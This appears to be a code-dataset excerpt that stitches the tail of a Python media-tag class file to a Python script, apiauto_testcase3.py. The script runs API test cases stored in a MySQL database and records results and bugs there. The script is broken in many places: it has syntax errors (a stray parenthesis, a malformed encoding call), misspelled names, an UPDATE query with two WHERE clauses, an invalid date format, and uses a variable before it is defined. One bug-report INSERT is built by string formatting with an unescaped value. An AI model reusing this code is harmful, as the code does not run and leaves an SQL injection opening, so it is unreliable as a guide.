if isinstance(content, (VideoTargetTypes, AudioTargetTypes)):
self.value = content.name
else:
self.value = content
class TargetTypeValue(TagString):
def __init__(self, content: TargetTypesInt):
super().__init__(content)
if isinstance(content, (VideoTargetTypes, AudioTargetTypes)):
self.value = content.value
else:
self.value = content
class TagTrackUID(TagString):
pass
class TagChapterUID(TagString):
pass
class TagAttachmentUID(TagString):
pass
class TagEditionUID(TagString):
pass
|
StarcoderdataPython
|
1813157
|
<filename>apitest/apiauto_testcase3.py
#coding:utf-8
import requests,time,sys,re
import urllib,zlib
import pymysql
import HtmlTestRunner
import unittest
from trace import CoverageResults
import json
from idlelib.rpc import response_queue
from time import sleep
#import fconfig
HOSTNAME = '127.0.0.1'
class ApiFlow(unittest.TestCase):
"""登录支付购物接口流程"""
def setUp(self):
time.sleep(1)
def test_readSQLcase(selfself):
sql = "SELECT id,`apiname`,apiurl,apimethod,apiparamvalue,apiresult,`apistatus` from apitest_apistep where apitest_apistep.Apitest_id=2 "
coon = pymysql.connect(user='root', passwd='<PASSWORD>', db='autotest', port=3306, host='127.0.0.1',charset='utf8')
cursor = coon.cursor()
aa = cursor.execute(sql)
info = cursor.fetchmany(aa)
print(info)
for ii in info:
case_list = []
case_list.append(ii)
#CredentialId()
interfaceTest(case_list)
coon.commit()
cursor.close()
coon.close()
def readSQLcase():
sql = "SELECT id,`apiname`,apiurl,apimethod,apiparamvalue,apiresult,`apistatus` FROM apitest_apistep where apitest_apistep.Apitest_id=3 "
coon = pymysql.connect(user='root',passwd='<PASSWORD>',db='autotest',port=3306,host='127.0.0.1',charset='utf8')
cursor = coon.cursor()
aa=cursor.execute(sql)
info = cursor.fetchmany(aa)
for ii in info:
case_list = []
case_list.append(ii)
# CredentialId()
interfaceTest(case_list)
coon.commit()
cursor.close()
coon.close()
def interfaceTest(case_list):
res_flags = []
requst_urls = []
responses = []
strinfo = re.compile('{TaskId}')
strinfo1 = re.compile('{AssetId}')
strinfo2 = re.compile('{PointId}')
assetinfo = re.compile('{assetno}')
tasknoinfo = re.compile('{taskno}')
schemainfo = re.compile('{schema}')
for case in case_list:
try:
case_id = case[0]
interface_name = case[1]
method = case[3]
url = case[2]
param = case[4]
res_check = case[5]
except Exception as e:
return '测试用例格式不正确!%s'%e
if param == '':
new_url = 'http://'+'api.test.com.cn'+url
elif param == 'null':
new_url = 'http://'+url
else:
url = strinfo.sub(TaskId,url)
param = strinfo2.sub(PointId,param)
param = strinfo.sub(TaskId,param)
param = tasknoinfo.sub(taskno,param)
new_url = 'http://'+'127.0.0.1'+url
requst_urls.append(new_url)
if method.upper() == 'GET':
headers = {'Authorization':'', 'Content-Type':'application/json'}
if "=" in urlParam(param):
data = None
print(str(case_id)+ ' request is get'+new_url.encode('utf-8')+'?'+urlParam(param).encode('utf-8'))
results = requsts.get(new_url+'?'+urlParam(param),data,headers=headers).text
print(' response is get'+results.encode('utf-8'))
responses.append(results)
res = readRes(results,'')
else:
print(' request is get '+new_url+' body is '+urlParam(param))
data = None
req = urllib.request.Request(url=new_url,data=data,headers=headers,method="GET")
results = urllib.request.urlopen(req).read()
print(' response is get ')
print(results)
res = readRes(results,res_check)
#print results
if 'pass' == res:
res_flags.append('pass')
writeResult(case_id,'1')
caseWriteResult(case_id,'1')
else:
res_flags.append('fail')
writeResult(case_id,'0')
caseWriteResult(case_id,'0')
if method.upper()=='PUT':
headers = {'HOST':HOSTNAME,'Connection':'keep-alive','CredentialId':id,'Content-Type':'application/json'}
body_data=param
results = requests.put(url=url,data=body_data,headers=headers)
responses.append(results)
res=readRes(results,res_check)
if 'pass' == res:
writeResult(case_id,'pass')
res_flags.append('pass')
else:
res_flags.append('fail')
writeResult(case_id,'fail')
writeBug(case_id,interface_name,new_url,results,res_check)
try:
preOrderSN(results)
except:
print('ok')
if method.upper()=='PATCH':
headers = {'Authorization':'Credential '+id, 'Content-Type':'application/json' }
data=None
results = requests.patch(new_url+'?'+urlParam(param),data,headers=headers).text
responses.append(results)
res = readRes(results,res_check)
if 'pass'==res:
writeResult(case_id,'pass')
res_flags.append('pass')
else:
res_flags.append('fail')
writeResult(case_id,'fail')
writeBug(case_id,interface_name,new_url,results,res_check)
try:
preOrderSN(results)
except:
print('ok')
if method.upper()=='POST':
headers = {'Authorization':'Credential '+id, 'Content-Type':'application/json'}
if '=' in urlParam(param):
data = None
results = requests.patch(new_url+'?'+urlParam(param),data,headers=headers).text
print(' response is post'+results.encode('utf-8'))
responses.append(results)
res = readRes(results,'')
else:
print(str(case_id)+' request is '+new_url.encode('utf-8')+' body is '+urlParam(param).encode('utf-8'))
results = requests.post(new_url,data=urlParam(param).encoding('utf-8)',headers=headers).text
print(' response is post'+results.encoding('utf-8'))
responses.append(results)
res = readRes(results,res_check)
if 'pass'==res:
writeResult(case_id,'1')
res_flags.append('pass')
else:
res_flags.append('fail')
writeResult(case_id,'0')
writeBug(case_id,interface_name,new_url,results,res_check))
try:
TaskId(results)
except:
print('ok1')
try:
PointId(results)
except:
print('ok2')
def readRes(res,res_check):
res = res.decode().replace('":"',"=").replace('":',"=")
res_check = res_check.split(';')
for s in res_check:
if s in res:
pass
else:
return '错误,返回参数和预期结果不一致'+s
return 'pass'
def urlParam(param):
param1=param.replace('"','"')
return param1
def CredentialId():
global id
url = 'http://'+'api.test.com.cn'+'/api/Security/Authentication/Signin/web'
body_data=json.dumps({"Identity":'test',"Password":'<PASSWORD>'})
headers = { 'Connection':'keep-alive','Content-Type':'application/json'}
response = requests.post(url=url,data=body_data,headers=headers)
data=response.text
regx = '.*"CredentialId":"(.*)","Scene"'
pm = re.search(regx,data)
id = pm.group(1)
def preOrderSN(results):
global preOrderSN
regx = '.*"preOrderSN":"(.*)","toHome"'
pm = re.search(regx,results)
if pm:
preOrderSN = pm.group(1).encode('utf-8')
return preOrderSN
return False
def TaskId(results):
global TaskId
regx = '.*"TaskId":(.*),"PlanId"'
pm=re.search(regx,results)
if pm:
TaskId = pm.group(1).encode('utf-8')
return TaskId
return False
def taskno(param):
global taskno
a = int(time.time())
taskno = 'task_' + str(a)
return taskno
def writeResult(case_id,result):
result = result.encode('utf-8')
now = time.strftime("%Y-%m-%d %H:%M:%S")
sql = "UPDATE apitest_apistep set apitest_apistep.apistatus=%s,apitest_apistep.create_time=%s where apitest_apistep.id=%s;"
param = (result,now,case_id)
print('api autotest result is '+result.decode())
coon = pymysql.connect(user='root',passwd='<PASSWORD>',db='autotest',port=3306,host='127.0.0.1',charset='utf8')
cursor=coon.cursor()
cursor.execute(sql,param)
coon.commit()
cursor.close()
coon.close()
def caseWriteResult(case_id,result):
result = result.encode('utf-8')
now = time.strftime("%Y-%m-%d %H:%M:%S")
sql = "UPDATE apitest_apitest as atat set atat.apistatus=%s,atat.create_time=%s where apitest_apistep.id=%s where atat.id=%s;"
param = (result,now,case_id)
print('api autotest result is '+result.decode())
coon = pymysql.connect(user='root', passwd='<PASSWORD>', db='autotest', port=3306, host='127.0.0.1', charset='utf8')
cursor = coon.cursor()
cursor.execute(sql, param)
coon.commit()
cursor.close()
coon.close()
def writeBug(bug_id,interface_name,request,response,res_check):
interface_name = interface_name.encode('utf-8')
res_check = res_check.encode('utf-8')
request = request.encode('utf-8')
now = time.strftime("%Y-%m-%d %H:%M:%S")
bugname = str(bug_id)+'_'+interface_name.decode()+'_出错了'
bugdetail = '[请求数据]<br />'+request.decode()+'<br />'+'[预期结果]<br/>'+res_check.decode()+'<br/>'+'<br/>'+'[响应数据]<br />'+'<br/>'+response.decode()
print(bugdetail)
sql = "INSERT INTO `bug_bug`(`bugname`, `bugdetail`, `bugstatus`, `buglevel`, `bugcreater`, `bugassign`, `create_time`, `product_id`) VALUES('%s', '%s', '1', '1', 'aaa', 'aaa', '%s', '2');"%(bugname,pymysql.escape_string(bugdetail),now)
coon = pymysql.connect(user='root',passwd='<PASSWORD>',db='autotest',port=3306,host='127.0.0.1',charset='utf8')
cursor=coon.cursor()
cursor.execute(sql)
coon.commit()
cursor.close()
coon.close()
if __name__=="__main__":
now = time.strftime("%Y-%m-%-%H_%M_%S",time.localtime(time.time()))
testunit = unittest.TestSuite()
testunit.addTest(ApiFlow("test_readSQLcase"))
filename=r"D:\Study\IT\01.Dev\2.Python\exercizes\autotest\apitest\templates\apitest_report.html"
fp=open(filename,'wb')
runner = HtmlTestRunner.HTMLTestRunner(stream=fp,title=u"流程接口测试报告",descriptions=u"接口场景接口")
runner.run(testunit)
#readSQLcase()
print('Done!')
time.sleep(1)
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.